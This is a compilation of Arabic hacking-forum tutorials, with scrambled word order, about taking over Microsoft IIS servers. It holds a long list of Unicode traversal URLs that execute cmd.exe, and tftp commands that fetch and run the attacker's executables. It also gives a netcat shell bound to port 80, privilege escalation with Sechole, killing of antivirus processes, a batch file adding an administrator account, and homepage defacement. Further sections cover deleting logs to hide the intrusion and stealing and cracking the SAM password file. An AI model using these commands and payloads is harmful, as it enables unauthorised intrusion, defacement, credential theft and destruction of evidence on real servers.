باسم -1 واحفظها عليها شعارك وضع صفحة بانشاء index.htm قمالـ  \:c على

برنامج -2 بتشغيل التالية TFTP قم الفقرة في االمر . ونفذ

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm

عليك - التعرف يتم ال حتى اللوق ملفات . مسحالـ ملفات حذف خالل من العملية هذه مجلد Log وتتم System32 من

االمر -: بواسطة/c+del+c:/winnt/system32/logfiles/*.log

،،، انتهى

" ) الثاني ) الجزء اليونيكود طريق عن " اإلختراق

> اإلسالمية الحزم شبكة منتديات من >منقول

الجميع يستطيع اساسية اوامر عن عبارة كان الدرساألول فيوالمهارة .. الذكاء بعض يتطلب الدرسفاألمر هذا في اما .. تطبيقها

 : البداية--------------

) القيام ) عليك شي اول فان يونيكود ما بثغرة مصاب موقع وجود عندمجلد نسخ هو الطريقة cmd1 الى cmd به : بهذه

C+copy+c:\winnt\system32+c:\winnt\system32\cmd1.exe الكتابة امر تفعيل هو  .. Echo والسبب

الجديد الملف من الثغرة نفذ ذلك يعرفه ( CMD1.exe وبعد شي هذافقط ) الجميع للتذكير  ! لكن

هذه .. خالل من المتصفح من الموقع لملفات تصفحك عند االنصالحيات لديك سيكون فانه هو IWAM_USER الثغرة المستخدم وهذا

للمجموعه ينتمي يوزر عن عن Guest عبارة المسؤوول اليوزر وهوسيرفر . IIS تشغيل

مجموعة من انه تم !! Guest وبما اذا اال كثيرة صالحيات يملك ال فهوسيء بشكل  اعداده  

رووت على الحصول محاولة من ادمانا اكثر شي في   اليوجد هذا

في nix* انظمة مختلف Microsot اما محاولة   فالوضع فإن صالحيات على التي Administrator الحصول ليسبالسهولة

مايكروسوفت   تتوقعها انظمة في محلي بشكل االمتيازات فرفع وانا .. الواحده اليد اصابع عددها يتعدى ال قليلة بطرق فقط ممكن

السيرفر على السيطرة احكام كيفية الشرح الموضوع هذا اكتبللمدير مكافيء حساب على موارد   والحصول بجميع والتمتع

.. النظام

المطلوبة +  : الملفاتSechole.exe وملحقاتها .

Kill.exe Tlist.exe 

ncx99.exe tftpd32.exe 

العده  جهز  .. هنا واحد مجلد في جمعتها الوقت  لتوفير

اداة كل عمل سأشرح  : االن

1 - Sechole بشكل االمتيازات لرفع موجود استثمار اقوى وهو ) نواة .. ) في صدع على يعتمد بأنه مبسط بشكل عمله وطريقة محلي

لمدير .. تابعه عملية اغتصاب خالله من يستطيع تي ان ويندوزامتيازاتك برفع خاللها من يقوم  النظام  .

2 - Tlist .. والفائده بالخلفيه تعمل التي العمليات بعرضجميع تقومفايروس + االنتي الفايروول اقفال هو  منها  

3- Kill.exe رقم باقفال ستقوم حيث السابقة لالداة متمم عملهاالسابقة االداة من المستخرج . العملية

3- NCX99 الباكدوور من مطورة المنفذ NC نسخه على 99ينصت  4- TFTP32.exe السيرفر الى الملفات  .. لنقل

مقدمه عن عبارة كان سبق ما االن   كل سيبدأ الحقيقي العمل اما : 

السيرفر الى السابق االدوات جميع برفع قم .. اوالبتشغيل قم مثال ncx99.exe ثم الشكل  : بهذا

http://target/scripts/..&Agrave;¯../...c+C:\ncx99.exe البورت على بالموقع باالتصال قم ذلك 99بعد ..

اوامر سطر على امتيازات CMD ستحصل . Guest = بدوناالداة بتشغيل قم التي .. TLIST االن العمليات جميع ستعرضلكالعملية .. رقم عن بالبحث قم فايروسان PID تعمل باالنتي الخاص

ناري .. جدار وجدت اذا وكذلك  .. وجدرقم ورقه PID سجل على فايروسوالفايروول باالنتي الخاص

 .. جانبيهباالداة االجراء بقتل قم الشكل Kill االن مكان .. KILL.exe PID : بهذا

PID العملية رقم  تضع  أن ! .. االجابة فايروس؟ االنتي اقفال من مالهدف البعض يسألمع تتعامل فايروس انتي من االخيرة انه Sechole التحديثات على

بتشغيل .. .. قم بنجاح السابقة العمليات اتمام بعد واالن باكدورSechole.exe    المتصفح . من

امتيازات رفم سيتم مجموعه IWAM_USER عندها الىAdministrators ..

مشاكل اي وبدون الحريه بكامل االوامر جميع تنفيذه بإمكانك االنالصالحيات . Access Denided في

االيكو بامر الرئيسية الصفحه على الكتابة شي اهم : وطبعاC+Echo+Hacked+by+XDeMoNX+

< +C;\inetpub\wwwroot\index.htm 

كلشي ليسهذا  .. ولكنالرئيسية الصفحه تغيير عن فقط يبحثون ال االذكياء القراصنه

على يحتوي او مهم الموقع كان اذا  خصوصاإلخ ... بيانات قواعد او  معلومات  

؟ : اليوزر بهذا الدخول تستطيع هل اي IWAM_USER سؤال الى؟؟ بي تي اف او تلنت مثل خدمه

كلمه : .. نملك ال لكننا امتيزاته برفع قمنا اننا صحيح ال االجابةعشوائي ! بشكل مسنده تكون النه  . المرور

وكسره السام ملف على الحصول الى البعض تفكير هذا  سيذهب اسهل .. ماهو يوجد لكن . ممكن

لـ مكافي حساب لدينا اننا كلمة Administrator بما نملك ال ولكننامع . بك خاصه باسورد مع باسمك جديد يوزر بإضافه رأيك ما المرور

ايضا !! المدير والتفكير  امتيازات الذكاء من قليل    التالي السطر واضف جديد نصي مستند بانشاء  : قم

net user Demon pass /add && net localgroup administrators Demon /add واالن Save as باسم . add.bat واحفظها

يوزر : بانشاء يقوم دفعاتي مجلد انشاء هو سابقا فعلناه ما توضيحمرور Demon جديد مجموعة Pass وكلمة الى واضافته

المدراء  االدمنستريتورز ..الملف برفع االن بواسطة ) add.bat قم المتصفح من تشغيلها ثم

 اليونكود(مدير حساب لديك تي ..   االن اف خدمه اي الى الدخول وتستطيع

غيرها بيوساو نت او تلنت او  بي  بك الخاصة الخلية االبواب واضافة االثار مسح النهاية في تنسى ال

القادمه المرات في الدخول  لتسهيل   )! واحد ) وكل طريقة شيخ لكل النه الجانب هذا في اتوسع لن طبعا

الملفات في والتحكم ادواته اخفاء في اسلوب . له

سابقة لنقطة .. نرجع؟ لماذا ؟؟ الفايروول اقفال منك طلبت اني تذكر هل

االمر تنفذ جربت سي .. netstat -an لو االن اوامر سطر خالل من

القلب يسر ما المنافذ من ستجد  فانك  نار 90% بجدران محمية وكانت دخلتها اللي السيرفرات   من

المنفذ حمايه 139وجدت بدون مفتوحا فيها    السقاط خيار من اكثر لك يجعل قد الفايرول اقفال فان لذا

 الهدف  

كالم .. أي الـ والتنسيق االمالء النحو على واختصار  اسف ايضا . المعلومات

على .. الحصول درجة الى بكثير ذلك من اكثر االستعراض باالمكانرسومي . GUI تحكم

فسأكتب .. فراغ وقت وجدت اذا الكافي الوقت لدي يكون لم لكنمثل اخرى وادوات اخرى طرق وكيفية Sechole2 و GEtAdmin عن

االداة بواسطه رسومي تحكم على .. WINvnc الحصول

،،،انتهى

اليونيكود " ثغرات من االستفادة كيفية عن عامة " معلومات

>منقول<> هنتر: بالك >الكاتب

مع اليونيكود عبر السيرفر في التحكم اساليب عن يتكلم الموضوعالمتطلبات بعض

المطلوبه : االدوات

يونيكود )1 ثغرات مسح  اداةسيرفر )2 TFTPD برنامجباليونيكود )3 جيده معرفة

==================================================================================================

او )1 المواقع من العديد من اليونيكود ثغرات على الحصول بأمكانكموقعي من

http://www.devil2k.com/هنتر )) (( بالك انا مني مهداه وهذه

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/syste

m32/cmd.exe?/c+dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+

dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\

/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/syste

m32/cmd.exe?/c+dir+c:\/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/

cmd.exe?/c+dir+c:\/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system

32/cmd.exe?/c+dir+c:\/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%

%35%63../winnt/system32/cmd.exe?/c+dir+c:\/_vti_bin/..

%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\

/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\

/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/

c+dir+c:\/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm

d.exe?/c+dir+c:\/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/

cmd.exe?/c+dir+c:\/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system

32/cmd.exe?/c+dir+c:\/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%

%35%63../winnt/system32/cmd.exe?/c+dir+c:\/_vti_bin/..

%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%

35%63../winnt/system32/cmd.exe?/c+dir+c:\/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syst

em32/cmd.exe?/c+dir+c:\/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste

m32/cmd.exe?/c+dir+c:\/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/syst

em32/cmd.exe?/c+dir+c:\/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syst

em32/cmd.exe?/c+dir+c:\/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/s

ystem32/cmd.exe?/c+dir+c:\/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/

cmd.exe?/c+dir+c:\/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/

cmd.exe?/c+dir+c:\/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/

cmd.exe?/c+dir+c:\/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+

dir+c:\/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+di

r+c:\/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/s

ystem32/cmd.exe\?/c+dir+c:\/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syst

em32/cmd.exe?/c+dir+c:\/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sy

stem32/cmd.exe?/c+dir+c:\/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/

system32/cmd.exe?/c+dir+c:\/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sys

tem32/cmd.exe?/c+dir+c:\/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/sys

tem32/cmd.exe?/c+dir+c:\/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/

system32/cmd.exe?/c+dir+c:\

برنامج )2 على الحصول الموقع TFTPD بأمكانك منhttp://iisbughelp.4t.com/

تستطيع )3 كيف تعرف ان يكفي جدا بسيطه اليونيكود معرفةالملفات وعبر الهارديسكات عبر االنتقال

) المتصفح عبر ) تعمل

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\هارديسك بداخل ما C:\ لقرائه

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+D:\هارديسك بداخل ما D:\ لقرائه

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E:\هارديسك بداخل ما E:\ لقرائه

مثال وهنا ثغرات من به ما لنرى الموقع على سكان بعمل نقوماليونيكود )) ثغرات اغلب المطلوب بالمجلد مبتدأه ثغرات على

المجلدات (( هذه من  تنطلق

1( المجلد msadc مثال/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?

/c+dir+C:\المجلد )2 vti_bin_ مثال

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\

سيرفرات المجلد )) (( IIS في يكون عادي بشكل تركيبها عندوهو معين اسم تحت للويب : الرئيسي

C:\Inetpub\wwwrootالمجلد في او

D:\Inetpub\wwwrootالمجلد في او

E:\Inetpub\wwwrootالهارديسك في يكون العاده انه C في على شرحي سأكمل ولذلك

هناكالسيرفر على التي المواقع جميع عادة المجلد هذا في ستجد

ولتكن ما يونيكود ثغرة وجدنا فلو/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?

/c+dir+c:\هكذا الثغره فسنكتب به ما لنرى الملف هذا الى الولوج : وأردنا

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot

باسمه موقع كل فستجدها مواقع عدة يحوي السيرفر كان ( اذاالـ مجلد بداخل مجلدات في السيرفر ) wwwroot ستجدها كان لو اما

عبارهالـ مجلد في الملفات كافة فستجد فقط واحد موقع wwwroot عن

نفسهوعليك االولى الرئيسيه الصفحة بتغيير الهاكر يقوم الظن اغلب في

اسم تحمل االولى الرئيسيه الصفحة ليسدائما انه تعلم انindex.htm

معظمها )) (( بعضها وهذه لها وأختصارات تسميات عدة هناكindex.htmindex.asp

default.htmdefault.aspmain.htmmain.asp

مجلدنا في للموقع الرئيسيه الصفحة ان وجدنا اننا االن لنفرضwwwroot هي index.htm يهمنا ما وهو بتغييرها فكيفسنقوم

عملية من تقريباهذه االختراق

الملفمن اسم بتغيير اوال اخر index.htm سنقوم اسم اي الىوليكن ببالك ss.htm يخطر

وسنقوم لديك المتصفح من اليونيكود ثغرة عبر االمر سنرسل طبعاالداله الداله c+dir بتغيير c+ren الى

نفساالوامر (( هي سوتضع التي االوامر ان تعرف ان عليكفي عارفا Command Prompt وفي Dos الموجوده تكون ان فعليك

استخدامه المراد االمر هو بماهكذا الثغره ستكتب : المهم

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.htm+ss.htm

من الصفحة اسم تغيير تم فقد ss.htm الى index.htm وهكذاسهل هو كم ؟  ارأيتم

A للموقع الرئيسيه الصفحة باغالق تكتفي لم المخترق ايها انك يبدوهو الموضوع وليكن اخر بموضوع صفحة تضع ان تريد فانت

Hacked!!!صفحة في ؟؟ index.htm فكيفسنرسلها

بمنفذ االتصال عبر وهي الطريقه هذه سأذكر ومنها طرق عدة هناكTFTP امامك الذي والموقع السيرفر وضع في انت فيه ستكون الذي

الكالينت وضع في

؟ هذا كيفسيتم

سيرفر نظام بتركيب قم المذكور ) TFTP اوال البرنامج جهازك علىاكثر اخر برنامج وهناك البرامج افضل من الموضوع اول في

يكفي ( هذا ولكن احترافافي الرئيسي السيرفر ضع لديك C:\ االن

وسمها وسريعه خفيفه صفحة بتصميم في index.htm قم وضعها\:C

من الجديد الملف للسيرفر نرسل ان نريد ملف C:\ االن الى لديناC:\inetpub\wwwroot

باألصح )) هو امر يوجد ميكروسوفت نظم ففي صعبا ليساالمر الاسم (( يحمل منفصال بسيط TFTP برنامجا كالينت عن عباره وهو

يستخدمالبعض )) TFTP بروتوكول يسميه جدا جدا بسيط بروتوكول وهو

والى (( من الملفات ارسال او بسحب يقوم التافه البروتوكولالجهاز

؟ ذلك لنا فكيف جهازنا من ملفا يسحب ان نريد نحنالتالي االمر توليفة لكتبنا اليونيكود غير في كنا لو : طبعا

tftp.exe -i XXX.XXX.XXX.XXX get index.htm C:\inetpub\wwwroot\index.htm

)) XXX.XXX.XXX.XXX منه الملف سحب المراد السيرفر بي اي تعني((

المسمى الملف بطلب الكالينت يقوم االمر هذا توليفة فيindex.htm المجلد في جهازه في wwwroot ليضعه

عن العادي الوضع يختلفمن االوامر توليفة فشكل تنسى ال ولكناليونيكود وضع

؟ الحل هو فماالتي الثغره في لتضعه يونيكود الى االمر توليفة تحول ان هو الحل

لديككالتالي شكله سيصبح يونيكود الى االمر تحويل : بعد

tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm

بالفعل العقبه تجاوزنا لقد  ياللروعه

الـ سيرفر بتشغيل قم الـ TFTP االن ملف بتجهيز index.htm وقمهذه اليها المضاف اليونيكود ثغرة عبر الموقع مع باالتصال وقم

النحو هذا على النهايه في ليصبح : التوليفه/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\

wwwroo t\index.htm 

عملية من وانتيهنا االنترنت الى الصفحة بتحميل قمنا وهكذاتقريبا )) ((  االختراق

ملفات : بتحميل تقوم ان يمكنك على EXE ملحوظه وتشغيلها ايضامثال وهذا بنفساالسلوب : السيرفر

ملف تحميل نريد اننا وسميناه EXE لنفرض السيرفر علىhunter.exe ؟ ذلك لنا فكيف تشغيله ونريد

االتي : سنتبعبتحميل قمنا كما السيرفر على الملف بتحميل index.htm نقوم

في التوليفه C:\ ونضعه هذه عبر : للسيرفر/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.ex

e?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe 

االمر هذا تنفيذ عبر الملفسنشغله تحميل يتم ان بعد

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exeاالمر هذا طريق عن او

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe

واحد عمل السيرفر في لدينا بقي االنتهاء على قاربنا وقد اآلناللوج ملفات مسح وهو اال هذا *.log فقط طريق عن ذلك وسيكون

: االمر/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?

/c+del+C:\*.log/s

المعلومات بعض فيها تخزين يتم الملفات من اخرى انواع هناكاالمتداد ذات الملفات مثل وهي ايضا مسحها tmp ويفضل

اليونيكود عبر مسحها امر : وهذا/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?

/c+del+C:\*.tmp/sفي عنك معلومات اي تبقى ال ان وهي مهمه ملحوظه ايضا

قم الحقيقيه ايميالتهم او اسمائهم البعضبذكر يفعل كما السيرفرعليك يدل شيء اي بمسح

المستوى )) (( هذا الى تصل ان حاول االختراق عملية على اوفايروس ارسال مثل اليها اتطرق لن واالفكار االشياء من عدد هناك

ملف على امر او في bat ما كبيره مشكله وضع من تتمكن حتىيعمل ال لكي السيرفر

تمرز ان او النظام ملفات جميع بمحو فايروسيقوم ترسل ان اوو بعد عن التحكم برامج طريق عن السيرفر في لديهم نفسك

جيد بشكل اخفائهاالكثير الملفات ذات المجلدات الكثير )) system32 مثل (( في والكثير

__________________________________________________ ______________________________

بعض : فهناك الحاالت كل في الثغره هذه تعمل لن ملحوظاتملف مسح طريق عن عليك الطريق بقطع يقومون tftp السيرفرات

سيرفراتهم منالمجلد (( في موجود ذلك عن المسؤول وبعض )) system32 الملف

ترقيعا )) ميكروسوفت اصدرت الترقيع بعملية قامت السيرفراتالثغره (( لهذه

الصادر الباكيج بمراقبة يقوم وول فاير واضع يكون قد وبعضهمالعمليات هذه لمثل اصطياد بعمل يقوم وقد والوارد

نظم في جدا القوي الحمايه برنامج بتركيب يقومون اال IIS واخرونشركة Secure IIS وهو Eeye من

قبل )) الموضوع هذا كتابة عند ولكن العقبات من العديد والعديديقارب (( ما كان اشهر اربعة فيها% 90حوالي التي السيرفرات من

IIS نظامألهمال )) (( او وقتها وجوده لعدم ترقيع وبدون الثغره هذه تحوي

.المدير17.

سيرفر ".18 إلختراق الكامل " IIS الدليل> الحزم شبكة منتديات من >منقول

> DEMON :الكاتب<---------  - : مقدمة

--------- سيرفرات انتشار مدى الجميع االكبر IIS يعلم النسبة تشكل حيث

االنترنت مواقع تشغيل في  .. المستخدمةلذا .. السيرفرات لهذه االمنية الناحية ضعف مدى الجميع ويعلمعملها كيفية توضيح مع النوع هذا ثغرات اشهر بجمع القيام  . قررت

---------  - : مالحظة

--------- سيرفرات على تعمل هنا الموجودة الطرق IIS5.0 و IIS4.0 معظم

البورت على تعتمد ((80وجميعها المتصفح )) خالل من يعني . 

-------------  - : المتطلبات

------------- 1- CGI-Scanner .. افضل أنا ( Whisker جيد هذا من تنزيله يمكنك

 ) www.wiretrip.net/rfp : الموقعالبيرل -2 ملفات لتشغيل بيرل الموقع ( اكتيف من تنزيله يمكنك

: http://www.activestate.com/ ( 3- ) او ) اباتشي نوع اي سيرفر  .. IIS ويب

##################################################

#########################

########### #! Game Starts # 

########### 

---------------- IIS Hack.exe : - 

---------------- شركة في االمن خبراء بتحميل eEye اكتشف لك تسمح امنية ثغرة

من ذكية المنفذ nc.exe نسخه على تنصت 80وجعلها .. اوامر سطر سيعطيك امتيازات cmde.exe وهذا  . Administrator مع

انزال من IIS Hack.exe و NC.exe بامكانك

 . /http://www.technotronic.com الموقعالثغرة تنفيذ قبل جهازك في سيرفر ويب تشغيل  .. ويجب

اداة بنسخ سيرفر nc.exe قم للويب الرئيسي الدليل في وضعها( لديك اباتشي  . wwwroot الدليل IIS وفي )Htdocs في

بتشغيل قم  : IISHack.exe ثمc:\<iishack.exe http://www.target.com/ 80 your_IP/ncx.exe 

بنجاح السابقة الخطوة اتمام  : وبعدc:\<nc http://www.target.com/  امامك  eGG SheLL وستجد

سيرفرات : على الثغرة هذه تعمل يتم )) IIS4.0 مالحظة لم اذا فقط)) الرقعه  . تركيب

do you want me to explain what to do next, hey common you must be kidding ...hehe.... 

----------------- MDAC = RDS :- 

----------------- ان ) ارى زلت ما لكني قليال قديمة ثغرة انها المواقع% 40اعتقد من

منها  .. تعانيبشكل الهدف النظام على اوامرك بتشغيل الثغرة هذه لك تسمح

مستخدم .. بصفتك وامرك تشغيل سيتم اي SYSTEM محليكان .. ما اذا معرفة اردت اذا العموم على النظام مدير بصالحيات

ال ام الثغرة بهذه مصابا  .. النظامالهدف بالنظام باالتصال اوال c:\<nc -nw -w : قم

2 http://www.host.com/ 80 االمر بارسال قم GET : ثم/msadc/msadcs.dll HTTP 

الرد كان اذا )) application/x_varg : فإذا مصاب النظام ان يعني فهذاترقيعه (( يتم  .. لم

الموقع هذا في العمل عليك تسهل بيرل سكربتات ايجاد بامكانك: www.wiretrip.net/rfp )) mdac.pl - msadc2.pl (( v 

c:\< mdac.pl -h host.com Please type the NT commandline you want to run )cmd /c

assumed(:\n cmd /c 

االمر تنفيذ اال عليك ما الرئيسية الصفحه تغيير اردت echo : إذاhacked by me hehe < C:\inetpub\wwwroot\index.htm 

تحميل بامكاننا الموقع على السيطرة احكام أردنا Hacker's وإذاSwiss knife Army اقصد Nc.exe االمر هذا  : بواسطة

%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe 

جيدا (( قراءته من لتتمكن اليمين الى اليسار من االمر بقراءة  )) قمالمنفذ على الهدف بالنظام باالتصال قم سطر 80بعدها وستجد

امتيازات مع  . Administrator اوامر

-------------------------------------- Codebrws.asp & Showcode.asp :- 

-------------------------------------- ملفات قاريء عن عبارة مع ASP الملفان يأتي IIS يأتي ال ولكنه

تفعيله النظام مدير على يجب بل افتراضيا  .. محمللك تسمح قهي كثيرا منها ستسفيد مفعلة الخدمة هذه كانت فإذا

ملف اي (( asp. بقراءة المصدر رؤية  . ))اعنيالنظام )) كان اذا السام ملف على ستحصل االمر هذا باستخدام

 : مصابا ((http://www.victim.com/msadc/samples...nt/repair/sam._ 

السام ملف على الحصول باستخدام .. Expand it & Crack it بعدلدي المفضلة ( LC3.0 االداة من اقل في كسرها ساعه 24سيتم ( . 

-------------- Null.htw : - 

------------ فقط .. سأكتفي لذا قليال معقد الثغرة هذه عمل كيفية شرح عملية

منها االستفادة  .. بطريقةملف الي السورسكود برؤية لك تسمح  .. ASP باختصار

الثغرة ?http://www.victim.com/null.htw : لتنفيذCiWe...HiliteType=full 

بالصفحه الخاص السورسكود الرابط هذا سيعرضلكDefault.asp . 

---------------------- webhits.dll & .htw : - 

---------------------- الهدف النظام على اللنك بتجربة قم اوال

: http://www.victim.com/blabla.htw العبارة بهذه الرد كان format of the QUERY_STRING is : فإذا

invalid بنسبة مصاب الهدف النظام ان يعني 90فهذا % . الطريقة بهذه الثغرة تنفيذ جرب  : اخيرا

http://www.victim.com/xxxxxxxxx/xxxx...ilitetype=full الـ تغيير الملحقات , XXXXX/XXXXX/XXXX/XXX.htw مع هذه باحد

احدها سيعمل  : وبالتأكيدiissamples/issamples/oop/qfullhit.htw 

iissamples/issamples/oop/qsumrhit.htw isssamples/exair/search/qfullhit.htw 

isssamples/exair/search/qsumrhit.htw االداة بواسطه بكسره قم السام ملف على ستحصل وبالتالي

LC3 .. 

------------------------------------------------ [ASP Alternate Data Streams [::$DATA :- 

------------------------------------------------ العام منذ بدايتها كانت الثغرة بالتحديد .. 1998هذه مخصصة وهي

بعضسيرفرات IIS3.0 لسيرفرات على تعمل  .. IIS4.0 واالنمالفائدة )) البعضيتساءل صفحه الي السورسكود عرض ومهمتها

تحتوي (( بعضالصفحات ان االجابة ؟؟ عرضسورسالصفحه من

مثل البيانات قواعد مرور كلمات مثل مهمة معلومات علىGlobal.asa 

األمر هذا بواسطة المتصفح من الثغرة تنفيذ يمكنhttp://www.victim.com/default.asp::$DATA 

------------------ ASP dot bug : - 

------------------ ايضا تقوم حيث الثغرة هذه النصهي هذا في ثغرة اقدم ربما

في .. اكتشافها تم حيث صفحه بأي الخاص السورسكود بعرض1997العام .. 

الشكل بهذا المتصفح من تنفيذها  : ويتم.http://www.victim.com/sample.asp  في الموجودة النقطة الحظ

السطر  اخرسيرفرات على تعمل فقط  . IIS3.0 وهي

------------------------------------ ISM.DLL Buffer Truncation : - 

------------------------------------ السورسكود ورؤوية الملفات بسحب للمهاجم يسمح برمجي خطأ

 .. ايضايطلب قمنا اننا بإيهامه السيرفر على التحايل هي الثغرة وفكرة

اخر .. ملف بطلب نقوم نحن الحقيقة وفي ما  .. ملفهو الخطأ هذا عن المسؤوول بعدد ISM.dll الملف تحميله يتم حيث

المسافة )% الرموز من  . Space (20كبيرالشكل بهذا الثغرة تنفيذ  : يمكن

http://www.victim.com/global.asa%20)...>=230(global.asa.htr الـ بوضع=< 230مكان الشكل 230نقوم بهذا 20مسافة % .. 

سيرفرات على يعمل الخطأ تجربتها .. IIS 4.0&5.0 هذا يمكن ال ولكنوتسجيل خروج بتسجيل قام اذا اال مره من اكثر السيرفر على

ايقاف , الى تؤدي السابقة الثغرة ان ذلك في السبب ويعود دخوليكون ISM.dll الملف ان الثغرة تطلب بينما الذاكرة في العمل عن

